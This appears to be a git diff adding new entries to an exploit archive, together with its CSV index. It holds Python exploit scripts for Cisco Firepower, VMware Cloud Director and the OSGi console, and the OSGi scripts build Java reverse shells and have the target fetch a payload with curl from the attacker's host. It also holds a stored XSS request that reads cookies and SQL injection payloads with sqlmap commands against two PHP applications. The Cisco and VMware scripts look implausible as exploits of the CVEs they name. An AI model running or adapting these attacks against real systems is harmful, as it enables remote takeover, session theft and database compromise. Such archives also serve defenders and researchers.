diff --git a/exploits/hardware/webapps/51881.py b/exploits/hardware/webapps/51881.py new file mode 100755 index 000000000..86f218261 --- /dev/null +++ b/exploits/hardware/webapps/51881.py @@ -0,0 +1,117 @@ +# Exploit Title: [Cisco Firepower Management Center] +# Google Dork: [non] +# Date: [12/06/2023] +# Exploit Author: [Abdualhadi khalifa](https://twitter.com/absholi_ly) +# Version: [6.2.3.18", "6.4.0.16", "6.6.7.1] +# CVE : [CVE-2023-20048] + +import requests +import json + +# set the variables for the URL, username, and password for the FMC web services interface +fmc_url = "https://fmc.example.com" +fmc_user = "admin" +fmc_pass = "cisco123" + +# create a requests session to handle cookies and certificate verification +session = requests.Session() +session.verify = False + +# send a POST request to the /api/fmc_platform/v1/auth/generatetoken endpoint to get the access token and refresh token +token_url = fmc_url + "/api/fmc_platform/v1/auth/generatetoken" +response = session.post(token_url, auth=(fmc_user, fmc_pass)) + +# check the response status and extract the access token and refresh token from the response headers +# set the access token as the authorization header for the subsequent requests +try: + if response.status_code == 200: + access_token = response.headers["X-auth-access-token"] + refresh_token = response.headers["X-auth-refresh-token"] + session.headers["Authorization"] = access_token + else: + print("Failed to get tokens, status code: " + str(response.status_code)) + exit() +except Exception as e: + print(e) + exit() + +# set the variable for the domain id +# change this to your domain id +domain_id = "e276abec-e0f2-11e3-8169-6d9ed49b625f" + +# send a GET request to the /api/fmc_config/v1/domain/{DOMAIN_UUID}/devices/devicerecords endpoint to get the list of devices managed by FMC +devices_url = fmc_url + "/api/fmc_config/v1/domain/" + domain_id + "/devices/devicerecords" +response = session.get(devices_url) + +# check the response status and extract the data as a json object +try: + if response.status_code == 200: + data = response.json() + else: + print("Failed to get devices, status code: " + str(response.status_code)) + exit() +except Exception as e: + print(e) + exit() + +# parse the data to get the list of device names and URLs +devices = [] +for item in data["items"]: + device_name = item["name"] + device_url = item["links"]["self"] + devices.append((device_name, device_url)) + +# loop through the list of devices and send a GET request to the URL of each device to get the device details +for device in devices: + device_name, device_url = device + response = session.get(device_url) + + # check the response status and extract the data as a json object + try: + if response.status_code == 200: + data = response.json() + else: + print("Failed to get device details, status code: " + str(response.status_code)) + continue + except Exception as e: + print(e) + continue + + # parse the data to get the device type, software version, and configuration URL + device_type = data["type"] + device_version = data["metadata"]["softwareVersion"] + config_url = data["metadata"]["configURL"] + + # check if the device type is FTD and the software version is vulnerable to the CVE-2023-20048 vulnerability + # use the values from the affected products section in the security advisory + if device_type == "FTD" and device_version in ["6.2.3.18", "6.4.0.16", "6.6.7.1"]: + print("Device " + device_name + " is vulnerable to CVE-2023-20048") + + # create a list of commands that you want to execute on the device + commands = ["show version", "show running-config", "show interfaces"] + device_id = device_url.split("/")[-1] + + # loop through the list of commands and send a POST request to the /api/fmc_config/v1/domain/{DOMAIN_UUID}/devices/devicerecords/{DEVICE_ID}/operational/command/{COMMAND} endpoint to execute each command on the device + # replace {DOMAIN_UUID} with your domain id, {DEVICE_ID} with your device id, and {COMMAND} with the command you want to execute + for command in commands: + command_url = fmc_url + "/api/fmc_config/v1/domain/" + domain_id + "/devices/devicerecords/" + device_id + "/operational/command/" + command + response = session.post(command_url) + + # check the response status and extract the data as a json object + try: + if response.status_code == 200: + data = response.json() + else: + print("Failed to execute command, status code: " + str(response.status_code)) + continue + except Exception as e: + print(e) + continue + + # parse the data to get the result of the command execution and print it + result = data["result"] + print("Command: " + command) + print("Result: " + result) + + else: + print("Device " + device_name + " is not vulnerable to CVE-2023-20048") \ No newline at end of file diff --git a/exploits/multiple/remote/51882.py b/exploits/multiple/remote/51882.py new file mode 100755 index 000000000..86882d5ef --- /dev/null +++ b/exploits/multiple/remote/51882.py @@ -0,0 +1,75 @@ +# Exploit Title: [VMware Cloud Director | Bypass identity verification] +# Google Dork: [non] +# Date: [12/06/2023] +# Exploit Author: [Abdualhadi khalifa](https://twitter.com/absholi_ly) +# Version: [10.5] +# CVE : [CVE-2023-34060] +import requests +import paramiko +import subprocess +import socket +import argparse +import threading + +# Define a function to check if a port is open +def is_port_open(ip, port): + # Create a socket object + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + # Set the timeout to 1 second + s.settimeout(1) + # Try to connect to the port + try: + s.connect((ip, port)) + # The port is open + return True + except: + # The port is closed + return False + finally: + # Close the socket + s.close() + +# Define a function to exploit a vulnerable device +def exploit_device(ip, port, username, password, command): + # Create a ssh client object + client = paramiko.SSHClient() + # Set the policy to accept any host key + client.set_missing_host_key_policy(paramiko.AutoAddPolicy()) + # Connect to the target using the credentials + client.connect(ip, port, "root", "vmware", allow_agent=False, look_for_keys=False) + # Execute the command and get the output + stdin, stdout, stderr = client.exec_command(command) + # Print the output + print(f"The output of the command {command} on the device {ip}:{port} is: {stdout.read().decode()}") + # Close the ssh connection + client.close() + + +# Parse the arguments from the user +parser = argparse.ArgumentParser(description="A Python program to detect and exploit the CVE-2023-34060 vulnerability in VMware Cloud Director") +parser.add_argument("ip", help="The target IP address") +parser.add_argument("-p", "--ports", nargs="+", type=int, default=[22, 5480], help="The target ports to check") +parser.add_argument("-u", "--username", default="root", help="The username for ssh") +parser.add_argument("-w", "--password", default="vmware", help="The password for ssh") +parser.add_argument("-c", "--command", default="hostname", help="The command to execute on the vulnerable devices") +args = parser.parse_args() + +# Loop through the ports and check for the vulnerability +for port in args.ports: + # Check if the port is open + if is_port_open(args.ip, port): + # The port is open, send a GET request to the port and check the status code + response = requests.get(f"http://{args.ip}:{port}") + if response.status_code == 200: + # The port is open and vulnerable + print(f"Port {port} is vulnerable to CVE-2023-34060") + # Create a thread to exploit the device + thread = threading.Thread(target=exploit_device, args=(args.ip, port, args.username, args.password, args.command)) + # Start the thread + thread.start() + else: + # The port is open but not vulnerable + print(f"Port {port} is not vulnerable to CVE-2023-34060") + else: + # The port is closed + print(f"Port {port} is closed") \ No newline at end of file diff --git a/exploits/multiple/webapps/51878.py b/exploits/multiple/webapps/51878.py new file mode 100755 index 000000000..8052d0631 --- /dev/null +++ b/exploits/multiple/webapps/51878.py @@ -0,0 +1,290 @@ +#!/usr/bin/python + +# Exploit Title: [OSGi v3.8-3.18 Console RCE] +# Date: [2023-07-28] +# Exploit Author: [Andrzej Olchawa, Milenko Starcik, +# VisionSpace Technologies GmbH] +# Exploit Repository: +# [https://github.com/visionspacetec/offsec-osgi-exploits.git] +# Vendor Homepage: [https://eclipse.dev/equinox] +# Software Link: [https://archive.eclipse.org/equinox/] +# Version: [3.8 - 3.18] +# Tested on: [Linux kali 6.3.0-kali1-amd64] +# License: [MIT] +# +# Usage: +# python exploit.py --help +# +# Example: +# python exploit.py --rhost=192.168.0.133 --rport=1337 --lhost=192.168.0.100 \ +# --lport=4444 + +""" +This is an exploit that allows to open a reverse shell connection from +the system running OSGi v3.8-3.18 and earlier. +""" +import argparse +import socket +import sys +import threading + +from functools import partial +from http.server import BaseHTTPRequestHandler, HTTPServer + +# Stage 1 of the handshake message +HANDSHAKE_STAGE_1 = \ + b"\xff\xfd\x01\xff\xfd" \ + b"\x03\xff\xfb\x1f\xff" \ + b"\xfa\x1f\x00\x74\x00" \ + b"\x37\xff\xf0\xff\xfb" \ + b"\x18" + +# Stage 2 of the handshake message +HANDSHAKE_STAGE_2 = \ + b"\xff\xfa\x18\x00\x58" \ + b"\x54\x45\x52\x4d\x2d" \ + b"\x32\x35\x36\x43\x4f" \ + b"\x4c\x4f\x52\xff\xf0" + +# The buffer of this size is enough to handle the telnet handshake +BUFFER_SIZE = 2 * 1024 + + +class HandlerClass(BaseHTTPRequestHandler): + """ + This class overrides the BaseHTTPRequestHandler. It provides a specific + functionality used to deliver a payload to the target host. + """ + + _lhost: str + _lport: int + + def __init__(self, lhost, lport, *args, **kwargs): + self._lhost = lhost + self._lport = lport + + super().__init__(*args, **kwargs) + + def _set_response(self): + self.send_response(200) + self.send_header("Content-type", "text/html") + self.end_headers() + + def do_GET(self): # pylint: disable=C0103 + """ + This method is responsible for the playload delivery. + """ + + print("Delivering the payload...") + + self._set_response() + self.wfile.write(generate_revshell_payload( + self._lhost, self._lport).encode('utf-8')) + + raise KeyboardInterrupt + + def log_message(self, format, *args): # pylint: disable=W0622 + """ + This method redefines a built-in method to suppress + BaseHTTPRequestHandler log messages. + """ + + return + + +def generate_revshell_payload(lhost, lport): + """ + This function generates the Revershe Shell payload that will + be executed on the target host. + """ + + payload = \ + "import java.io.IOException;import java.io.InputStream;" \ + "import java.io.OutputStream;import java.net.Socket;" \ + "class RevShell {public static void main(String[] args) " \ + "throws Exception { String host=\"%s\";int port=%d;" \ + "String cmd=\"sh\";Process p=new ProcessBuilder(cmd)." \ + "redirectErrorStream(true).start();Socket s=new Socket(host,port);" \ + "InputStream pi=p.getInputStream(),pe=p.getErrorStream(), " \ + "si=s.getInputStream();OutputStream po=p.getOutputStream()," \ + "so=s.getOutputStream();while(!s.isClosed()){while(pi.available()" \ + ">0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());" \ + "while(si.available()>0)po.write(si.read());so.flush();po.flush();" \ + "Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};" \ + "p.destroy();s.close();}}\n" % ( + lhost, lport) + + return payload + + +def run_payload_delivery(lhost, lport): + """ + This function is responsible for payload delivery. + """ + + print("Setting up the HTTP server for payload delivery...") + + handler_class = partial(HandlerClass, lhost, lport) + + server_address = ('', 80) + httpd = HTTPServer(server_address, handler_class) + + try: + print("[+] HTTP server is running.") + + httpd.serve_forever() + except KeyboardInterrupt: + print("[+] Payload delivered.") + except Exception as err: # pylint: disable=broad-except + print("[-] Failed payload delivery!") + print(err) + finally: + httpd.server_close() + + +def generate_stage_1(lhost): + """ + This function generates the stage 1 of the payload. + """ + + stage_1 = b"fork \"curl http://%s -o ./RevShell.java\"\n" % ( + lhost.encode() + ) + + return stage_1 + + +def generate_stage_2(): + """ + This function generates the stage 2 of the payload. + """ + + stage_2 = b"fork \"java ./RevShell.java\"\n" + + return stage_2 + + +def establish_connection(rhost, rport): + """ + This function creates a socket and establishes the connection + to the target host. + """ + + print("[*] Connecting to OSGi Console...") + sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + sock.connect((rhost, rport)) + print("[+] Connected.") + + return sock + + +def process_handshake(sock): + """ + This function process the handshake with the target host. + """ + + print("[*] Processing the handshake...") + sock.recv(BUFFER_SIZE) + sock.send(HANDSHAKE_STAGE_1) + sock.recv(BUFFER_SIZE) + sock.send(HANDSHAKE_STAGE_2) + sock.recv(BUFFER_SIZE) + sock.recv(BUFFER_SIZE) + + +def deliver_payload(sock, lhost): + """ + This function executes the first stage of the exploitation. + It triggers the payload delivery mechanism to the target host. + """ + + stage_1 = generate_stage_1(lhost) + + print("[*] Triggering the payload delivery...") + sock.send(stage_1) + sock.recv(BUFFER_SIZE) + sock.recv(BUFFER_SIZE) + + +def execute_payload(sock): + """ + This function executes the second stage of the exploitation. + It sends payload which is responsible for code execution. + """ + + stage_2 = generate_stage_2() + + print("[*] Executing the payload...") + sock.send(stage_2) + sock.recv(BUFFER_SIZE) + sock.recv(BUFFER_SIZE) + print("[+] Payload executed.") + + +def exploit(args, thread): + """ + This function sends the multistaged payload to the tareget host. + """ + + try: + sock = establish_connection(args.rhost, args.rport) + + process_handshake(sock) + deliver_payload(sock, args.lhost) + + # Join the thread running the HTTP server + # and wait for payload delivery + thread.join() + + execute_payload(sock) + + sock.close() + + print("[+] Done.") + except socket.error as err: + print("[-] Could not connect!") + print(err) + sys.exit() + + +def parse(): + """ + This fnction is used to parse and return command-line arguments. + """ + + parser = argparse.ArgumentParser( + prog="OSGi-3.8-console-RCE", + description="This tool will let you open a reverse shell from the " + "system that is running OSGi with the '-console' " + "option in versions between 3.8 and 3.18.", + epilog="Happy Hacking! :)", + ) + + parser.add_argument("--rhost", dest="rhost", + help="remote host", type=str, required=True) + parser.add_argument("--rport", dest="rport", + help="remote port", type=int, required=True) + parser.add_argument("--lhost", dest="lhost", + help="local host", type=str, required=False) + parser.add_argument("--lport", dest="lport", + help="local port", type=int, required=False) + parser.add_argument("--version", action="version", + version="%(prog)s 0.1.0") + + return parser.parse_args() + + +def main(args): + """ + Main fuction. + """ + + thread = threading.Thread( + target=run_payload_delivery, args=(args.lhost, args.lport)) + thread.start() + + exploit(args, thread) + + +if __name__ == "__main__": + main(parse()) \ No newline at end of file diff --git a/exploits/multiple/webapps/51879.py b/exploits/multiple/webapps/51879.py new file mode 100755 index 000000000..2c992cb68 --- /dev/null +++ b/exploits/multiple/webapps/51879.py @@ -0,0 +1,144 @@ +#!/usr/bin/python + +# Exploit Title: [OSGi v3.7.2 Console RCE] +# Date: [2023-07-28] +# Exploit Author: [Andrzej Olchawa, Milenko Starcik, +# VisionSpace Technologies GmbH] +# Exploit Repository: +# [https://github.com/visionspacetec/offsec-osgi-exploits.git] +# Vendor Homepage: [https://eclipse.dev/equinox] +# Software Link: [https://archive.eclipse.org/equinox/] +# Version: [3.7.2 and before] +# Tested on: [Linux kali 6.3.0-kali1-amd64] +# License: [MIT] +# +# Usage: +# python exploit.py --help +# +# Examples: +# python exploit.py --rhost=localhost --rport=1337 --lhost=localhost \ +# --lport=4444 +# +# python exploit.py --rhost=localhost --rport=1337 --payload= \ +# "curl http://192.168.100.100/osgi_test" + + +""" +This is an exploit that allows to open a reverse shell connection from +the system running OSGi v3.7.2 and earlier. +""" +import argparse +import base64 +import socket + + +def parse(): + """ + This fnction is used to parse and return command-line arguments. + """ + + parser = argparse.ArgumentParser( + prog="OSGi-3.7.2-console-RCE", + description="This tool will let you open a reverse shell from the " + "system that is running OSGi with the '-console' " + "option in version 3.7.2 (or before).", + epilog="Happy Hacking! :)", + ) + + parser.add_argument("--rhost", dest="rhost", + help="remote host", type=str, required=True) + parser.add_argument("--rport", dest="rport", + help="remote port", type=int, required=True) + parser.add_argument("--lhost", dest="lhost", + help="local host", type=str, required=False) + parser.add_argument("--lport", dest="lport", + help="local port", type=int, required=False) + parser.add_argument("--payload", dest="custom_payload", + help="custom payload", type=str, required=False) + parser.add_argument("--version", action="version", + version="%(prog)s 0.1.0") + + args = parser.parse_args() + + if args.custom_payload and (args.lhost or args.lport): + parser.error( + "either --payload or both --lport and --rport are required.") + + return args + + +def generate_payload(lhost, lport, custom_payload): + """ + This function generates the whole payload ready for the delivery. + """ + + payload = "" + + if custom_payload: + payload = custom_payload + + print("(*) Using custom payload.") + elif lhost and lport: + payload = \ + "echo 'import java.io.IOException;import java.io.InputStream;" \ + "import java.io.OutputStream;import java.net.Socket;class Rev" \ + "Shell {public static void main(String[] args) throws Excepti" \ + "on { String host=\"%s\";int port=%s;String cmd=\"sh\";Proces" \ + "s p=new ProcessBuilder(cmd).redirectErrorStream(true).start(" \ + ");Socket s=new Socket(host,port);InputStream pi=p.getInputSt" \ + "ream(),pe=p.getErrorStream(), si=s.getInputStream();OutputSt" \ + "ream po=p.getOutputStream(), so=s.getOutputStream();while(!s" \ + ".isClosed()){while(pi.available()>0)so.write(pi.read());whil" \ + "e(pe.available()>0)so.write(pe.read());while(si.available()>" \ + "0)po.write(si.read());so.flush();po.flush();Thread.sleep(50)" \ + ";try {p.exitValue();break;}catch (Exception e){}};p.destroy(" \ + ");s.close();}}' > RevShell.java ; java ./RevShell.java" % ( + lhost, lport) + + print("(+) Using Java reverse shell payload.") + + bash_payload = b"bash -c {echo,%s}|{base64,-d}|{bash,-i}" % ( + base64.b64encode(payload.encode())) + + wrapped_payload = b"fork \"%s\"\n" % (bash_payload) + + return wrapped_payload + + +def deliver_payload(rhost, rport, payload): + """ + This function connects to the target host and delivers the payload. + It returns True if successful; False otherwise. + """ + + print("(*) Sending payload...") + + try: + sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + sock.connect((rhost, rport)) + sock.send(payload) + sock.close() + except socket.error as err: + print(f"(-) Could not deliver the payload to {rhost}:{rport}!") + print(err) + return False + + return True + + +def main(args): + """ + Main function. + """ + + payload = generate_payload(args.lhost, args.lport, args.custom_payload) + + success = deliver_payload(args.rhost, args.rport, payload) + if success: + print("(+) Done.") + else: + print("(-) Finished with errors.") + + +if __name__ == "__main__": + main(parse()) \ No newline at end of file diff --git a/exploits/multiple/webapps/51883.txt b/exploits/multiple/webapps/51883.txt new file mode 100644 index 000000000..fa7ff6043 --- /dev/null +++ b/exploits/multiple/webapps/51883.txt @@ -0,0 +1,56 @@ +Exploit Title: SnipeIT 6.2.1 - Stored Cross Site Scripting +Date: 06-Oct-2023 +Exploit Author: Shahzaib Ali Khan +Vendor Homepage: https://snipeitapp.com +Software Link: https://github.com/snipe/snipe-it/releases/tag/v6.2.1 +Version: 6.2.1 +Tested on: Windows 11 22H2 and Ubuntu 20.04 +CVE: CVE-2023-5452 + +Description: SnipeIT 6.2.1 is affected by a stored cross-site scripting +(XSS) feature that allows attackers to execute JavaScript commands. The +location endpoint was vulnerable. + +Steps to Reproduce: + +1. Login as a standard user [non-admin] > Asset page > List All +2. Click to open any asset > Edit Asset +3. Create new location and add the payload: + +4. Now login to any other non-admin or admin > Asset page > List All +5. Open the same asset of which you can change the location and the payload +will get executed. + +POC Request: + +POST /api/v1/locations HTTP/1.1 +Host: localhost +Content-Length: 118 +Accept: */* +X-CSRF-TOKEN: CDJkvGNWzFKFueeNx0AQMJIhhXJGZmKG1SFeVEGV +X-Requested-With: XMLHttpRequest +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 +(KHTML, like Gecko) Chrome/117.0.5938.63 Safari/537.36 +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +Origin: http://localhost +Referer: http://localhost/hardware/196/edit +Accept-Encoding: gzip, deflate, br +Accept-Language: en-US,en;q=0.9 +Cookie: snipeit_session=AHw3ARN6pdg90xU4ovG1FBZywycKPLIxjTUfmELO; +assetsListingTable.bs.table.cardView=false; laravel_token= +eyJpdiI6IitpM1RXVEVEVGNLZzRTd28wYmhZblE9PSIsInZhbHVlIjoickJocmNYTzNOS3JYdkdhSmpJME1GRmJYMi9DUnVkaStDTzBnbHZDVG1xNVAvbTA5cjJHM1FTbi95SEVzNmNnNzdKNHY5em5pK3 +ZjQ2F3VnB6RnhJRCs4NkV6NW16RnRWb3M0cXBuT2ZpZExoQ3JrN1VIVHB3cWV5NUtBRWZ4OXBsdEx4R0hSeElLV1BEbWk2WGxiWEBOMDg5cGFySj1rSnENckx3bXg2Qi9KQzFvNGJJTktjTVUw0EI4YVNM +d2UxdW1TelBDV1ByUk9yeTFOUDR1cS9SV2tFRi9LOG1iZGVweUxJdGhHTXRLSnFvTU82QVIvREphS215bkRtKzM5M1RVQ21nVENsT1M1Mn1FUT1TbFkOVDVPbHd4a3BFQW1YQkY3NFR2bzRQSGZIelppa0 +01MGYvSmFrbXVGWHpV0FMiLCJtYWMi0iJjZjMwMmQ4ZTB1NmM4MDU5YzU4MTYzZTgxNTcx0WEwYmM2Y2EyMmRlYzZhMmE2ZjI1NzIxYjc4NmIxNjRiOWM5IiwidGFnIjoiIn0%3D; +XSRF-TOKEN= +eyJpdiI6IjNmMVpNUEpDNCtpV0pHKOczZDRSUmc9PSIsInZhbHVlIjoiWXYvZkY2bTk4MONsUUFZQjZiVWtPdm1JRE1WWmpBd2tsZWNJblgxZWg3dONYL2x0Zkxib3N5Y1N5YmRYVm1XUm91N3pES1F1bH +FWMEV1Y2xsZ1VqZ1FYdmdYcjJRZXZMZG9NYmpWY2htL2tPdXNBQUdEbjVHSEVjV2tzKOpYelEiLCJtYWMi0iI1YzhkNmQ2NDAxNmZkYTQ1NzVhZmI5OGY3ODA3MDkOOTc4ZWVhYmMiZWIYMjZhZGZiZWI5 +MjMOMGJjZDBkNzU4IiwidGFnIjoiIn0%3D +Connection: close + +name=%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E&city=%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E&country= + + + +Thanks, +Shahzaib Ali Khan \ No newline at end of file diff --git a/exploits/php/webapps/51877.txt b/exploits/php/webapps/51877.txt new file mode 100644 index 000000000..6432035b4 --- /dev/null +++ b/exploits/php/webapps/51877.txt @@ -0,0 +1,24 @@ +# Exploit Title: Human Resource Management System - SQL Injection +# Date: 13-01-2024 +# Exploit Author: Srikar ( Exp1o1t9r ) +# Vendor Homepage: https://www.sourcecodester.com/php/15740/human-resource-management-system-project-php-and-mysql-free-source-code.html +# Software Link: https://www.sourcecodester.com/php/15740/human-resource-management-system-project-php-and-mysql-free-source-code.html +# https://www.sourcecodester.com/sites/default/files/download/oretnom23/hrm.zip +# Version: 1.0 (Monday, October 10, 2022 - 13:37) +# Tested On: Windows 10 Pro 10.0.19044 N/A Build 1288 + XAMPP V3.3.0 +# Vulnerable URL and Parameter:URL: + + +Parameter: employeeid=2 The following payloads successfully identified SQL injection +vulnerabilities: +employeeid=2' AND 9667=9667-- NFMgemployeeid=2' AND (SELECT +6014 FROM(SELECT COUNT(*),CONCAT(0x716a767671,(SELECT +(ELT(6014=6014,1))),0x7162716b71,FLOOR(RAND(0)*2))x FROM +INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- ywfiemployeeid=2' AND (SELECT +7160 FROM (SELECT(SLEEP([SLEEPTIME])))IzXD)-- ninWemployeeid=-4254' UNION +ALL SELECT +NULL,CONCAT(0x716a767671,0x457977584e79636568687641497a4b6e637668455a487948534e50737753626f5a4a545244616276,0x7162716b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- +- * + +# Response:MySQL: 10.4.32-MariaDB +Users:'pma'@'localhost''root'@'127.0.0.1''root'@'::1''root'@'localhost'* \ No newline at end of file diff --git a/exploits/php/webapps/51880.txt b/exploits/php/webapps/51880.txt new file mode 100644 index 000000000..6c9cf5e36 --- /dev/null +++ b/exploits/php/webapps/51880.txt @@ -0,0 +1,72 @@ ++ **Exploit Title:** CVE-2023-7137_Client_Details_System-SQL_Injection_1 ++ **Date:** 2023-26-12 ++ **Exploit Author:** Hamdi Sevben ++ **Vendor Homepage:** https://code-projects.org/client-details-system-in-php-with-source-code/ ++ **Software Link:** https://download-media.code-projects.org/2020/01/CLIENT_DETAILS_SYSTEM_IN_PHP_WITH_SOURCE_CODE.zip ++ **Version:** 1.0 ++ **Tested on:** Windows 10 Pro + PHP 8.1.6, Apache 2.4.53 ++ **CVE:** CVE-2023-7137 + +## References: ++ **CVE-2023-7137:** https://vuldb.com/?id.249140 ++ https://www.cve.org/CVERecord?id=CVE-2023-7137 ++ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-7137 ++ https://nvd.nist.gov/vuln/detail/CVE-2023-7137 + +## Description: +Client Details System 1.0 allows SQL Injection via parameter 'uemail' in "/clientdetails/". Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latest vulnerabilities in the underlying database. + +## Proof of Concept: ++ Go to the User Login page: "http://localhost/clientdetails/" ++ Fill email and password. ++ Intercept the request via Burp Suite and send to Repeater. ++ Copy and paste the request to a "r.txt" file. ++ Captured Burp request: +``` +POST /clientdetails/ HTTP/1.1 +Host: localhost +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 +Accept-Encoding: gzip, deflate +Accept-Language: en-us,en;q=0.5 +Cache-Control: no-cache +Content-Length: 317 +Content-Type: application/x-www-form-urlencoded +Referer: http://localhost/clientdetails/ +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36 + +uemail=user@mail.com&login=LOG+IN&password=P@ass123 +``` + ++ Use sqlmap to exploit. In sqlmap, use 'uemail' parameter to dump the database. +``` +python sqlmap.py -r r.txt -p uemail --risk 3 --level 5 --threads 1 --random-agent tamper=between,randomcase --proxy="http://127.0.0.1:8080" --dbms mysql --batch --current-db +``` + +``` +--- +Parameter: uemail (POST) + Type: boolean-based blind + Title: OR boolean-based blind - WHERE or HAVING clause (NOT) + Payload: uemail=user@mail.com' OR NOT 6660=6660-- FlRf&login=LOG IN&password=P@ass123 + + Type: error-based + Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) + Payload: uemail=user@mail.com' AND (SELECT 6854 FROM(SELECT COUNT(*),CONCAT(0x717a717a71,(SELECT (ELT(6854=6854,1))),0x7176627871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- Oxlo&login=LOG IN&password=P@ass123 + + Type: time-based blind + Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) + Payload: uemail=user@mail.com' AND (SELECT 5335 FROM (SELECT(SLEEP(5)))qsPA)-- pwtE&login=LOG IN&password=P@ass123 + + Type: UNION query + Title: Generic UNION query (NULL) - 7 columns + Payload: uemail=user@mail.com' UNION ALL SELECT NULL,CONCAT(0x717a717a71,0x45575259495444506f48756469467471555975554d6f794d77677a4f50547145735052567278434f,0x7176627871),NULL,NULL,NULL,NULL,NULL-- -&login=LOG IN&password=P@ass123 +--- +[14:58:11] [INFO] the back-end DBMS is MySQL +web application technology: Apache 2.4.53, PHP, PHP 8.1.6 +back-end DBMS: MySQL >= 5.0 (MariaDB fork) +[14:58:11] [INFO] fetching current database +current database: 'loginsystem' +``` + ++ current database: `loginsystem` +![1](https://github.com/h4md153v63n/CVEs/assets/5091265/bfbec122-5b56-42df-beda-41dfdcaf527a) \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index ffa32025d..c1a2e0103 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -4165,6 +4165,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 30362,exploits/hardware/webapps/30362.txt,"Cisco EPC3925 - Cross-Site Request Forgery",2013-12-16,"Jeroen - IT Nerdbox",webapps,hardware,,2013-12-16,2013-12-16,0,CVE-2013-6976;OSVDB-101097,,,,, 30415,exploits/hardware/webapps/30415.txt,"Cisco EPC3925 - Persistent Cross-Site Scripting",2013-12-21,"Jeroen - IT Nerdbox",webapps,hardware,,2013-12-22,2013-12-22,0,CVE-2013-6976;OSVDB-101097,,,,, 46263,exploits/hardware/webapps/46263.txt,"Cisco Firepower Management Center 6.2.2.2 / 6.2.3 - Cross-Site Scripting",2019-01-28,"Bhushan B. Patil",webapps,hardware,443,2019-01-28,2019-01-30,1,CVE-2019-1642,"Cross-Site Scripting (XSS)",,,, +51881,exploits/hardware/webapps/51881.py,"Cisco Firepower Management Center < 6.6.7.1 - Authenticated RCE",2024-03-12,"Abdualhadi khalifa",webapps,hardware,,2024-03-12,2024-03-12,0,,,,,, 25292,exploits/hardware/webapps/25292.txt,"Cisco Linksys E4200 - Multiple Vulnerabilities",2013-05-07,sqlhacker,webapps,hardware,,2013-05-07,2016-10-27,0,CVE-2013-2684;CVE-2013-2683;CVE-2013-2682;CVE-2013-2681;CVE-2013-2680;CVE-2013-2679;CVE-2013-2678;OSVDB-93065;OSVDB-93064;OSVDB-93063;OSVDB-93062;OSVDB-93061;OSVDB-93060;OSVDB-93059;OSVDB-89911,,,,, 16252,exploits/hardware/webapps/16252.html,"Cisco Linksys WAG120N - Cross-Site Request Forgery",2011-02-26,"Khashayar Fereidani",webapps,hardware,,2011-02-26,2011-02-26,0,OSVDB-71032,,,,, 18503,exploits/hardware/webapps/18503.txt,"Cisco Linksys WAG54GS - Cross-Site Request Forgery (Change Admin Password)",2012-02-21,"Ivano Binetti",webapps,hardware,,2012-02-21,2012-02-21,0,OSVDB-80809,,,,, @@ -11528,6 +11529,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 44000,exploits/multiple/remote/44000.txt,"Vitek - Remote Command Execution / Information Disclosure (PoC)",2017-12-22,bashis,remote,multiple,,2018-02-07,2018-02-07,0,,,,,,https://github.com/mcw0/PoC/blob/3220fa6a56c61cf53652e98356f94e0c6a833cd3/Vitek_RCE_and_information_disclosure.txt 44001,exploits/multiple/remote/44001.txt,"Vivotek IP Cameras - Remote Stack Overflow (PoC)",2017-12-12,bashis,remote,multiple,,2018-02-07,2018-02-07,0,,,,,,https://github.com/mcw0/PoC/blob/96892a5e7d513298b3181265055d437753dbaa55/Vivotek%20IP%20Cameras%20-%20Remote%20Stack%20Overflow.txt 15617,exploits/multiple/remote/15617.txt,"VMware 2 Web Server - Directory Traversal",2010-11-25,clshack,remote,multiple,,2010-11-30,2013-12-08,1,OSVDB-69586,,,http://www.exploit-db.com/screenshots/idlt16000/vmware-traversal.png,, +51882,exploits/multiple/remote/51882.py,"VMware Cloud Director 10.5 - Bypass identity verification",2024-03-12,"Abdualhadi khalifa",remote,multiple,,2024-03-12,2024-03-12,0,,,,,, 28312,exploits/multiple/remote/28312.txt,"VMware ESX 2.x - Multiple Information Disclosure Vulnerabilities",2006-07-31,"Stephen de Vries",remote,multiple,,2006-07-31,2013-09-15,1,CVE-2006-2481;OSVDB-27695,,,,,https://www.securityfocus.com/bid/19249/info 28962,exploits/multiple/remote/28962.rb,"VMware Hyperic HQ Groovy Script-Console - Java Execution (Metasploit)",2013-10-14,Metasploit,remote,multiple,,2013-10-14,2013-10-14,1,OSVDB-98804;CVE-2013-6366,"Metasploit Framework (MSF)",,,, 33310,exploits/multiple/remote/33310.nse,"VMware Server 2.0.1 / ESXi Server 3.5 - Directory Traversal",2009-10-27,"Justin Morehouse",remote,multiple,,2009-10-27,2014-05-12,1,CVE-2009-3733;OSVDB-59440,,,,,https://www.securityfocus.com/bid/36842/info @@ -12112,6 +12114,8 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 50551,exploits/multiple/webapps/50551.txt,"orangescrum 1.8.0 - Privilege escalation 